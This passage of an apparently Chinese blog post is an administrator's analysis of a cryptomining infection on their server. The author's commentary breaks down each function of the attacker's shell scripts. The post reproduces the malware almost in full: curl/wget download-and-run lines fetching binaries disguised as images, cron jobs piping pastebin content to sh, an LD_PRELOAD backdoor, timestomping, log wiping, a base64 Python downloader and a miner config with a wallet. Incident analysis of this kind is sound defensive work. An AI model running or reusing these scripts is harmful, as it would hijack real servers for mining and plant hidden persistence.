ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:7777"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "stratum.f2pool.com:8888"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmrpool.eu" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmrig" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmrigDaemon" | awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "xmrigMiner" | awk '{print $2}'|xargs kill -9
pkill -f biosetjenkins
pkill -f AnXqV.yam
pkill -f xmrigDaemon
pkill -f xmrigMiner
pkill -f xmrig
pkill -f Loopback
pkill -f apaceha
pkill -f cryptonight
pkill -f stratum
pkill -f mixnerdx
pkill -f performedl
pkill -f JnKihGjn
pkill -f irqba2anc1
pkill -f irqba5xnc1
pkill -f irqbnc1
pkill -f ir29xc1
pkill -f conns
pkill -f irqbalance
pkill -f crypto-pool
pkill -f minexmr
pkill -f XJnRj
pkill -f NXLAi
pkill -f BI5zj
pkill -f askdljlqw
pkill -f minerd
pkill -f minergate
pkill -f Guard.sh
pkill -f ysaydh
pkill -f bonns
pkill -f donns
pkill -f kxjd
pkill -f Duck.sh
pkill -f bonn.sh
pkill -f conn.sh
pkill -f kworker34
pkill -f kw.sh
pkill -f pro.sh
pkill -f polkitd
pkill -f acpid
pkill -f icb5o
pkill -f nopxi
pkill -f irqbalanc1
pkill -f minerd
pkill -f i586
pkill -f gddr
pkill -f mstxmr
pkill -f ddg.2011
pkill -f wnTKYg
pkill -f deamon
pkill -f disk_genius
pkill -f sourplum
pkill -f bashx
pkill -f bashg
pkill -f bashe
pkill -f bashf
pkill -f bashh
pkill -f XbashY
pkill -f libapache
rm -rf /tmp/httpd.conf
rm -rf /tmp/conn
rm -rf /tmp/root.sh /tmp/pools.txt /tmp/libapache /tmp/config.json /tmp/bashf /tmp/bashg /tmp/libapache
rm -rf /tmp/conns
rm -f /tmp/irq.sh
rm -f /tmp/irqbalanc1
rm -f /tmp/irq
rm -f /tmp/kworkerds /bin/kworkerds /bin/config.json
netstat -anp | grep 69.28.55.86:443 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 3333 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 4444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 5555 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 6666 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 7777 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 3347 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 14444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
netstat -anp | grep 5.196.225.222 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
y=$(ps aux | grep -v grep | grep kworkerds | wc -l )
if [ ${y} -eq 0 ];then
netstat -anp | grep 13531 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9
fi
}
function system() {
if [ ! -f "/bin/httpdns" ]; then
curl -fsSL https://pastebin.com/raw/698D7kZU -o /bin/httpdns && chmod 755 /bin/httpdns
if [ ! -f "/bin/httpdns" ]; then
wget https://pastebin.com/raw/698D7kZU -O /bin/httpdns && chmod 755 /bin/httpdns
fi
sed -i '$d' /etc/crontab && echo -e "* */6 * * * root /bin/sh /bin/httpdns" >> /etc/crontab
fi
}
function top() {
if [ ! -f "/usr/local/lib/libntp.so" ]; then
curl -fsSL http://thyrsi.com/t6/365/1535595427x-1404817712.jpg -o /usr/local/lib/libntp.so && chmod 755 /usr/local/lib/libntp.so
if [ ! -f "/usr/local/lib/libntp.so" ]; then
wget http://thyrsi.com/t6/365/1535595427x-1404817712.jpg -O /usr/local/lib/libntp.so && chmod 755 /usr/local/lib/libntp.so
fi
fi
if [ ! -f "/etc/ld.so.preload" ]; then
echo /usr/local/lib/libntp.so > /etc/ld.so.preload
else
sed -i '$d' /etc/ld.so.preload && echo /usr/local/lib/libntp.so >> /etc/ld.so.preload
fi
touch -acmr /bin/sh /etc/ld.so.preload
touch -acmr /bin/sh /usr/local/lib/libjdk.so
touch -acmr /bin/sh /usr/local/lib/libntp.so
echo 0>/var/spool/mail/root
echo 0>/var/log/wtmp
echo 0>/var/log/secure
echo 0>/var/log/cron
}
function python() {
nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L25ZQnB1QXhUJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz'))" >/dev/null 2>&1 &
touch /tmp/.tmpa
}
function echocron() {
echo -e "*/10 * * * * root /bin/chmod 755 /usr/bin/curl && /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" > /etc/cron.d/root
echo -e "*/30 * * * * /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo -e "* */10 * * * /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" > /var/spool/cron/crontabs/root
touch -acmr /bin/sh /etc/cron.d/root
touch -acmr /bin/sh /var/spool/cron/crontabs
touch -acmr /bin/sh /var/spool/cron/root
touch -acmr /bin/sh /var/spool/cron/crontabs/root
}
function downloadrun() {
ps=$(netstat -anp | grep 13531 | wc -l)
if [ ${ps} -eq 0 ];then
if [ ! -f "/tmp/kworkerds" ]; then
curl -fsSL http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -o /tmp/kworkerds && chmod +x /tmp/kworkerds
if [ ! -f "/tmp/kworkerds" ]; then
wget http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -O /tmp/kworkerds && chmod +x /tmp/kworkerds
fi
nohup /tmp/kworkerds >/dev/null 2>&1 &
else
nohup /tmp/kworkerds >/dev/null 2>&1 &
fi
fi
}
function downloadrunxm() {
pm=$(netstat -anp | grep 13531 | wc -l)
if [ ${pm} -eq 0 ];then
if [ ! -f "/bin/config.json" ]; then
curl -fsSL http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -o /bin/config.json && chmod +x /bin/config.json
if [ ! -f "/bin/config.json" ]; then
wget http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -O /bin/config.json && chmod +x /bin/config.json
fi
fi
if [ ! -f "/bin/kworkerds" ]; then
curl -fsSL http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -o /bin/kworkerds && chmod +x /bin/kworkerds
if [ ! -f "/bin/kworkerds" ]; then
wget http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -O /bin/kworkerds && chmod +x /bin/kworkerds
fi
nohup /bin/kworkerds >/dev/null 2>&1 &
else
nohup /bin/kworkerds >/dev/null 2>&1 &
fi
fi
}
update=$( curl -fsSL --connect-timeout 120 https://pastebin.com/raw/C4ZhQFrH )
if [ ${update}x = "update"x ];then
rm -rf /tmp/lock* /bin/kworkerds /bin/config.json /tmp/kworkerds /root/kworkerds
echocron
else
if [ ! -f "/tmp/.tmpa" ]; then
rm -rf /tmp/.tmp
python
fi
kills
downloadrun
echocron
system
top
sleep 10
port=$(netstat -anp | grep 13531 | wc -l)
if [ ${port} -eq 0 ];then
downloadrunxm
fi
fi
#
#
这个shell就比较复杂了,一个一个来分析吧,从上到下看看他封装的shell方法吧
https://pastebin.com/raw/698D7kZU
内容/usr/bin/curl -fsSL --connect-timeout 120 https://pastebin.com/raw/kDSLjxfQ|/usr/bin/base64 -d|/bin/bash
保存到 /bin/httpdns 文件并给他赋权限 https://pastebin.com/raw/kDSLjxfQ
又是一个base64 `IyEvYmluL3NoClNIRUxMPS9iaW4vc2gKUEFUSD0vdXNyL2xvY2FsL3NiaW46L3Vzci9sb2NhbC9iaW46L3NiaW46L2JpbjovdXNyL3NiaW46L3Vzci9iaW4KCmZ1bmN0aW9uIGRvd25sb2FkcnVuKCkgewoJcHM9JChuZXRzdGF0IC1hbnAgfCBncmVwIDEzNTMxIHwgd2MgLWwpCglpZiBbICR7cHN9IC1lcSAwIF07dGhlbgoJCWlmIFsgISAtZiAiL3RtcC9rd29ya2VyZHMiIF07IHRoZW4KCQkJY3VybCAtZnNTTCAtLWNvbm5lY3QtdGltZW91dCAxMjAgaHR0cDovL3RoeXJzaS5jb20vdDYvMzU4LzE1MzQ0OTUxMjd4LTE0MDQ3NjQyNDcuanBnIC1vIC90bXAva3dvcmtlcmRzICYmIGNobW9kICt4IC90bXAva3dvcmtlcmRzCgkJCWlmIFsgISAtZiAiL3RtcC9rd29ya2VyZHMiIF07IHRoZW4KCQkJCXdnZXQgaHR0cDovL3RoeXJzaS5jb20vdDYvMzU4LzE1MzQ0OTUxMjd4LTE0MDQ3NjQyNDcuanBnIC1PIC90bXAva3dvcmtlcmRzICYmIGNobW9kICt4IC90bXAva3dvcmtlcmRzCgkJCWZpCgkJCQlub2h1cCAvdG1wL2t3b3JrZXJkcyA+L2Rldi9udWxsIDI+JjEgJgoJCWVsc2UKCQkJbm9odXAgL3RtcC9rd29ya2VyZHMgPi9kZXYvbnVsbCAyPiYxICYKCQlmaQoJZmkKfQoKZnVuY3Rpb24gZG93bmxvYWRydW54bSgpIHsKCXBtPSQobmV0c3RhdCAtYW5wIHwgZ3JlcCAxMzUzMSB8IHdjIC1sKQoJaWYgWyAke3BtfSAtZXEgMCBdO3RoZW4KCQlpZiBbICEgLWYgIi9iaW4vY29uZmlnLmpzb24iIF07IHRoZW4KCQkJY3VybCAtZnNTTCAtLWNvbm5lY3QtdGltZW91dCAxMjAgaHR0cDovL3RoeXJzaS5jb20vdDYvMzU4LzE1MzQ0OTYwMjJ4LTE0MDQ3NjQ1ODMuanBnIC1vIC9iaW4vY29uZmlnLmpzb24gJiYgY2htb2QgK3ggL2Jpbi9jb25maWcuanNvbgoJCQlpZiBbICEgLWYgIi9iaW4vY29uZmlnLmpzb24iIF07IHRoZW4KCQkJCXdnZXQgaHR0cDovL3RoeXJzaS5jb20vdDYvMzU4LzE1MzQ0OTYwMjJ4LTE0MDQ3NjQ1ODMuanBnIC1PIC9iaW4vY29uZmlnLmpzb24gJiYgY2htb2QgK3ggL2Jpbi9jb25maWcuanNvbgoJCQlmaQoJCWZpCgkJaWYgWyAhIC1mICIvYmluL2t3b3JrZXJkcyIgXTsgdGhlbgoJCQljdXJsIC1mc1NMIC0tY29ubmVjdC10aW1lb3V0IDEyMCBodHRwOi8vdGh5cnNpLmNvbS90Ni8zNTgvMTUzNDQ5MTc5OHgtMTQwNDc2NDQyMC5qcGcgLW8gL2Jpbi9rd29ya2VyZHMgJiYgY2htb2QgK3ggL2Jpbi9rd29ya2VyZHMKCQkJaWYgWyAhIC1mICIvYmluL2t3b3JrZXJkcyIgXTsgdGhlbgoJCQkJd2dldCBodHRwOi8vdGh5cnNpLmNvbS90Ni8zNTgvMTUzNDQ5MTc5OHgtMTQwNDc2NDQyMC5qcGcgLU8gL2Jpbi9rd29ya2VyZHMgJiYgY2htb2QgK3ggL2Jpbi9rd29ya2VyZHMKCQkJZmkKCQkJCW5vaHVwIC9iaW4va3dvcmtlcmRzID4vZGV2L251bGwgMj4mMSAmCgkJZWxzZQoJCQlub2h1cCAvYmluL2t3b3JrZXJkcyA+L2Rldi9udWxsIDI+JjEgJgoJCWZpCglmaQp9CgpmdW5jdGlvbiBpbml0KCkgewoJaWYgWyAhIC1mICIvdXNyL3NiaW4va3dvcmtlciIgXTsgdGhlbgoJCWN1cmwgLWZzU0wgLS1jb25uZWN0LXRpbWVvdXQgMTIwIGh0dHA6Ly90aHlyc2kuY29tL3Q2LzM2Mi8xNTM1MTc1MDE1eC0xNDA0ODE3ODgwLmpwZyAtbyAvdXNyL3NiaW4va3dvcmtlciAmJiBjaG1vZCA3NzcgL3Vzci9zYmluL2t3b3JrZXIKCQlpZiBbICEgLWYgIi91c3Ivc2Jpbi9rd29ya2VyIiBdOyB0aGVuCgkJCXdnZXQgaHR0cDovL3RoeXJzaS5jb20vdDYvMzYyLzE1MzUxNzUwMTV4LTE0MDQ4MTc4ODAuanBnIC1PIC91c3Ivc2Jpbi9rd29ya2VyICYmIGNobW9kIDc3NyAvdXNyL3NiaW4va3dvcmtlcgoJCWZpCglmaQoJaWYgWyAhIC1mICIvZXRjL2luaXQuZC9rd29ya2VyIiBdOyB0aGVuCgkJY3VybCAtZnNTTCAtLWNvbm5lY3QtdGltZW91dCAxMjAgaHR0cDovL3RoeXJzaS5jb20vdDYvMzYyLzE1MzUxNzUzNDN4LTE1NjY2NTc2NzUuanBnIC1vIC9ldGMvaW5pdC5kL2t3b3JrZXIgJiYgY2htb2QgNzc3IC9ldGMvaW5pdC5kL2t3b3JrZXIKCQlpZiBbICEgLWYgIi9ldGMvaW5pdC5kL2t3b3JrZXIiIF07IHRoZW4KCQkJd2dldCBodHRwOi8vdGh5cnNpLmNvbS90Ni8zNjIvMTUzNTE3NTM0M3gtMTU2NjY1NzY3NS5qcGcgLU8gL2V0Yy9pbml0LmQva3dvcmtlciAmJiBjaG1vZCA3NzcgL2V0Yy9pbml0LmQva3dvcmtlcgoJCWZpCglmaQoJY2hrY29uZmlnIC0tYWRkIGt3b3JrZXIKfQoKZnVuY3Rpb24gZWNob2Nyb24oKSB7CgllY2hvIC1lICIqLzEwICogKiAqICogcm9vdCAvdXNyL2Jpbi9jdXJsIGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy94Ylk3cDVUYnxzaFxuIyMiID4gL2V0Yy9jcm9uLmQvcm9vdAoJZWNobyAtZSAiKi8zMCAqICogKiAqCS91c3IvYmluL2N1cmwgLWZzU0wgaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L3hiWTdwNVRifHNoXG4jIyIgPiAvdmFyL3Nwb29sL2Nyb24vcm9vdAoJbWtkaXIgLXAgL3Zhci9zcG9vbC9jcm9uL2Nyb250YWJzCgllY2hvIC1lICIqICovMTAgKiAqICoJL3Vzci9iaW4vY3VybCAtZnNTTCBodHRwczovL3Bhc3RlYmluLmNvbS9yYXcveGJZN3A1VGJ8c2hcbiMjIiA+IC92YXIvc3Bvb2wvY3Jvbi9jcm9udGFicy9yb290Cn0KCgp1cGRhdGU9JCggY3VybCAtZnNTTCAtLWNvbm5lY3QtdGltZW91dCAxMjAgaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L0M0WmhRRnJIICkKaWYgWyAke3VwZGF0ZX14ID0gInVwZGF0ZSJ4IF07dGhlbgoJcm0gLXJmIC90bXAvbG9jayogL2Jpbi9rd29ya2VyZHMgL2Jpbi9jb25maWcuanNvbiAvdG1wL2t3b3JrZXJkcyAvcm9vdC9rd29ya2VyZHMKCWVjaG9jcm9uCmVsc2UKCWRvd25sb2FkcnVuCglpbml0CgllY2hvY3JvbgoJc2xlZXAgMTAKCXBvcnQ9JChuZXRzdGF0IC1hbnAgfCBncmVwIDEzNTMxIHwgd2MgLWwpCglpZiBbICR7cG9ydH0gLWVxIDAgXTt0aGVuCgkJZG93bmxvYWRydW54bQoJZmkKZmkKIwoj
``` 解码之后是
"se-preview-section-delimiter">
```shell
#!/bin/sh
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
function downloadrun() {
ps=$(netstat -anp | grep 13531 | wc -l)
if [ ${ps} -eq 0 ];then
if [ ! -f "/tmp/kworkerds" ]; then
curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -o /tmp/kworkerds && chmod +x /tmp/kworkerds
if [ ! -f "/tmp/kworkerds" ]; then
wget http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -O /tmp/kworkerds && chmod +x /tmp/kworkerds
fi
nohup /tmp/kworkerds >/dev/null 2>&1 &
else
nohup /tmp/kworkerds >/dev/null 2>&1 &
fi
fi
}
function downloadrunxm() {
pm=$(netstat -anp | grep 13531 | wc -l)
if [ ${pm} -eq 0 ];then
if [ ! -f "/bin/config.json" ]; then
curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -o /bin/config.json && chmod +x /bin/config.json
if [ ! -f "/bin/config.json" ]; then
wget http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -O /bin/config.json && chmod +x /bin/config.json
fi
fi
if [ ! -f "/bin/kworkerds" ]; then
curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -o /bin/kworkerds && chmod +x /bin/kworkerds
if [ ! -f "/bin/kworkerds" ]; then
wget http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -O /bin/kworkerds && chmod +x /bin/kworkerds
fi
nohup /bin/kworkerds >/dev/null 2>&1 &
else
nohup /bin/kworkerds >/dev/null 2>&1 &
fi
fi
}
function init() {
if [ ! -f "/usr/sbin/kworker" ]; then
curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/362/1535175015x-1404817880.jpg -o /usr/sbin/kworker && chmod 777 /usr/sbin/kworker
if [ ! -f "/usr/sbin/kworker" ]; then
wget http://thyrsi.com/t6/362/1535175015x-1404817880.jpg -O /usr/sbin/kworker && chmod 777 /usr/sbin/kworker
fi
fi
if [ ! -f "/etc/init.d/kworker" ]; then
curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/362/1535175343x-1566657675.jpg -o /etc/init.d/kworker && chmod 777 /etc/init.d/kworker
if [ ! -f "/etc/init.d/kworker" ]; then
wget http://thyrsi.com/t6/362/1535175343x-1566657675.jpg -O /etc/init.d/kworker && chmod 777 /etc/init.d/kworker
fi
fi
chkconfig --add kworker
}
function echocron() {
echo -e "*/10 * * * * root /usr/bin/curl https://pastebin.com/raw/xbY7p5Tb|sh\n##" > /etc/cron.d/root
echo -e "*/30 * * * * /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo -e "* */10 * * * /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" > /var/spool/cron/crontabs/root
}
update=$( curl -fsSL --connect-timeout 120 https://pastebin.com/raw/C4ZhQFrH )
if [ ${update}x = "update"x ];then
rm -rf /tmp/lock* /bin/kworkerds /bin/config.json /tmp/kworkerds /root/kworkerds
echocron
else
downloadrun
init
echocron
sleep 10
port=$(netstat -anp | grep 13531 | wc -l)
if [ ${port} -eq 0 ];then
downloadrunxm
fi
fi
#
#
这个等会再分析
http://thyrsi.com/t6/365/1535595427x-1404817712.jpg
图片保存到服务器的/usr/local/lib/libntp.so
(同事保存到/etc/ld.so.preload
)并赋权限,这个看似一个图片其实应该是个动态链接库具体有什么作用还不太清楚,但是凭感觉没有干什么好事,然后把他刚创建的这几个文件 /etc/ld.so.preload``/usr/local/lib/libjdk.so``/usr/local/lib/libntp.so
的修改时间变得和/bin/sh
一样(真是大大的坏)python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CgpkPSAnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L25ZQnB1QXhUJwp0cnk6CiAgICBwYWdlPWJhc2U2NC5iNjRkZWNvZGUodXJsbGliLnVybG9wZW4oZCkucmVhZCgpKQogICAgZXhlYyhwYWdlKQpleGNlcHQ6CiAgICBwYXNz'))"
这个就是最开始查到的python进程(原来是在这被启动的)"*/10 * * * * root /bin/chmod 755 /usr/bin/curl && /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##"
分别是 /etc/cron.d/root
/var/spool/cron/root
/var/spool/cron/crontabs/root
, 同样把他们的修改时间变得和/bin/sh
一样http://thyrsi.com/t6/358/1534495127x-1404764247.jpg
的内容保存到/tmp/kworkerds
并赋权限 然后后台执行 /tmp/kworkerds
这个应该是个可执行文件 但是不是一个shell,但是干掉一个也不是什么好事http://thyrsi.com/t6/358/1534496022x-1404764583.jpg
的内容保存到/bin/config.json
并赋权限,这是一个json {
"algo": "cryptonight",
"api": {
"port": 0,
"access-token": null,
"worker-id": null,
"ipv6": false,
"restricted": true
},
"av": 0,
"background": false,
"colors": true,
"cpu-affinity": null,
"cpu-priority": null,
"donate-level": 0,
"huge-pages": true,
"hw-aes": null,
"log-file": null,
"max-cpu-usage": 100,
"pools": [
{
"url": "stratum+tcp://xmr.f2pool.com:13531",
"user": "47eCpELDZBiVoxDT1tBxCX7fFU4kcSTDLTW2FzYTuB1H3yzrKTtXLAVRsBWcsYpfQzfHjHKtQAJshNyTU88LwNY4Q3rHFYA.xmrig",
"pass": "x",
"rig-id": null,
"nicehash": false,
"keepalive": false,
"variant": 1
}
],
"print-time": 60,
"retries": 5,
"retry-pause": 5,
"safe": false,
"threads": null,
"user-agent": null,
"watch": false
}
没有看到哪里使用了,但是应该是和之前的动态链接库和可执行文件有关,同时把http://thyrsi.com/t6/358/1534491798x-1404764420.jpg
的内容保存到/bin/kworkerds
并赋权限,然后后台执行 /tmp/kworkerds
分析这个shell脚本
脚本封装的一些方法基本分析完了,看看这个脚本干了什么事情:先kills
杀掉一堆进程,然后downloadrun
下载一个可执行文件并后台运行,再echocron
写了一堆定时任务,再system
下载了动态链接库,然后top
下载一个动态链接库并同步到/etc/ld.so.preload
植入了预加载型恶意动态链接库后门,休息10s
后downloadrunxm
下载config.json
,下载可执行文件/bin/kworkerds
并后台运行
这个shell分析完了再看看system
方法里面出现的那个shell
#!/bin/sh
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
function downloadrun() {
ps=$(netstat -anp | grep 13531 | wc -l)
if [ ${ps} -eq 0 ];then
if [ ! -f "/tmp/kworkerds" ]; then
curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -o /tmp/kworkerds && chmod +x /tmp/kworkerds
if [ ! -f "/tmp/kworkerds" ]; then
wget http://thyrsi.com/t6/358/1534495127x-1404764247.jpg -O /tmp/kworkerds && chmod +x /tmp/kworkerds
fi
nohup /tmp/kworkerds >/dev/null 2>&1 &
else
nohup /tmp/kworkerds >/dev/null 2>&1 &
fi
fi
}
function downloadrunxm() {
pm=$(netstat -anp | grep 13531 | wc -l)
if [ ${pm} -eq 0 ];then
if [ ! -f "/bin/config.json" ]; then
curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -o /bin/config.json && chmod +x /bin/config.json
if [ ! -f "/bin/config.json" ]; then
wget http://thyrsi.com/t6/358/1534496022x-1404764583.jpg -O /bin/config.json && chmod +x /bin/config.json
fi
fi
if [ ! -f "/bin/kworkerds" ]; then
curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -o /bin/kworkerds && chmod +x /bin/kworkerds
if [ ! -f "/bin/kworkerds" ]; then
wget http://thyrsi.com/t6/358/1534491798x-1404764420.jpg -O /bin/kworkerds && chmod +x /bin/kworkerds
fi
nohup /bin/kworkerds >/dev/null 2>&1 &
else
nohup /bin/kworkerds >/dev/null 2>&1 &
fi
fi
}
function init() {
if [ ! -f "/usr/sbin/kworker" ]; then
curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/362/1535175015x-1404817880.jpg -o /usr/sbin/kworker && chmod 777 /usr/sbin/kworker
if [ ! -f "/usr/sbin/kworker" ]; then
wget http://thyrsi.com/t6/362/1535175015x-1404817880.jpg -O /usr/sbin/kworker && chmod 777 /usr/sbin/kworker
fi
fi
if [ ! -f "/etc/init.d/kworker" ]; then
curl -fsSL --connect-timeout 120 http://thyrsi.com/t6/362/1535175343x-1566657675.jpg -o /etc/init.d/kworker && chmod 777 /etc/init.d/kworker
if [ ! -f "/etc/init.d/kworker" ]; then
wget http://thyrsi.com/t6/362/1535175343x-1566657675.jpg -O /etc/init.d/kworker && chmod 777 /etc/init.d/kworker
fi
fi
chkconfig --add kworker
}
function echocron() {
echo -e "*/10 * * * * root /usr/bin/curl https://pastebin.com/raw/xbY7p5Tb|sh\n##" > /etc/cron.d/root
echo -e "*/30 * * * * /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo -e "* */10 * * * /usr/bin/curl -fsSL https://pastebin.com/raw/xbY7p5Tb|sh\n##" > /var/spool/cron/crontabs/root
}
update=$( curl -fsSL --connect-timeout 120 https://pastebin.com/raw/C4ZhQFrH )
if [ ${update}x = "update"x ];then
rm -rf /tmp/lock* /bin/kworkerds /bin/config.json /tmp/kworkerds /root/kworkerds
echocron
else
downloadrun
init
echocron
sleep 10
port=$(netstat -anp | grep 13531 | wc -l)
if [ ${port} -eq 0 ];then
downloadrunxm
fi
fi
#
#
这个shell和之前那个shell很相似很多方法重复了,但是也有一些变化,同样先看看他的方法
http://thyrsi.com/t6/358/1534495127x-1404764247.jpg
的内容保存到/tmp/kworkerds
并赋权限然后后台执行 /tmp/kworkerds
把http://thyrsi.com/t6/358/1534496022x-1404764583.jpg
的内容保存到/bin/config.json
并赋权限,这是一个json 同时把http://thyrsi.com/t6/358/1534491798x-1404764420.jpg
的内容保存到/bin/kworkerds
并赋权限,然后后台执行 /tmp/kworkerds
到处写定时任务
这个方法之前没有,把http://thyrsi.com/t6/362/1535175015x-1404817880.jpg
的内容保存到/usr/sbin/kworker
并赋权限,这也是一个可执行文件,把http://thyrsi.com/t6/362/1535175343x-1566657675.jpg
的内容保存到/etc/init.d/kworker
并赋权限,这也是一个shell脚本是kworker
的脚本chkconfig --add kworker
添加开机自启
#! /bin/bash
#chkconfig: - 99 01
#description: kworker daemon
#processname: /usr/sbin/kworker
### BEGIN INIT INFO
# Provides: /user/sbin/kworker
# Required-Start:
# Required-Stop:
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# Short-Description: kworker deamon
# Description: kworker deamon
### END INIT INFO
LocalPath="/usr/sbin/kworker"
name='kworker'
pid_file="/var/run/$name.pid"
stdout_log="/var/log/$name.log"
stderr_log="/var/log/$name.err"
get_pid(){
cat "$pid_file"
}
is_running(){
[ -f "$pid_file" ] &&/usr/sbin/kworker -Pid $(get_pid) > /dev/null 2>&1
}
case "$1" in
start)
if is_running; then
echo "Already started"
else
echo "Starting $name"
$LocalPath >>"$stdout_log" 2>> "$stderr_log" &
echo $! > "$pid_file"
if ! is_running; then
echo "Unable to start, see$stdout_log and $stderr_log"
exit 1
fi
fi
;;
stop)
if is_running; then
echo -n "Stopping$name.."
kill $(get_pid)
for i in {1..10}
do
if ! is_running; then
break
fi
echo -n "."
sleep 1
done
echo
if is_running; then
echo "Not stopped; maystill be shutting down or shutdown may have failed"
exit 1
else
echo "Stopped"
if [ -f "$pid_file"]; then
rm "$pid_file"
fi
fi
else
echo "Not running"
fi
;;
restart)
$0 stop
if is_running; then
echo "Unable to stop, will notattempt to start"
exit 1
fi
$0 start
;;
status)
if is_running; then
echo "Running"
else
echo "Stopped"
exit 1
fi
;;
*)
echo "Usage: $0{start|stop|restart|status}"
exit 1
;;
esac
exit 0
方法分析完了分析一下这个shell:就是downloadrun
下载可执行文件/tmp/kworkerds
并后台运行然后init
下载并配置kworkerd开机自启之后echocron
在三个地方配置定时任务sleep 10
休息10sdownloadrunxm
下载/bin/config.json
并下载可执行文件/tmp/kworkerds
后台运行
终于分析完这个黑客程序的大致流程并把他启的各个线程干掉,下载的个个文件干掉。分析最开始中毒可能是由于安装redis的时候不小心怎么调用了这个程序,如果没有阿里云预警可能一直没有办法发现就一直被占用资源占用带宽,以后安装程序还是尽量走官方途径服务器也开启秘钥方式登录比较好,还有就是一些脚本程序后台程序如果用不到就尽量不装。总之感觉经历一次服务器被黑并深入看他的代码感觉成长还是比较大的。然后就是这里面的一些代码和shell脚本存放地址都是一些三方机构的还是没有能找到黑客自己的地址感觉也是很遗憾的可能和放在可执行文件里面或者和"url": "stratum+tcp://xmr.f2pool.com:13531"
,"user":"47eCpELDZBiVoxDT1tBxCX7fFU4kcSTDLTW2FzYTuB1H3yzrKTtXLAVRsBWcsYpfQzfHjHKtQAJshNyTU88LwNY4Q3rHFYA.xmrig"
有关。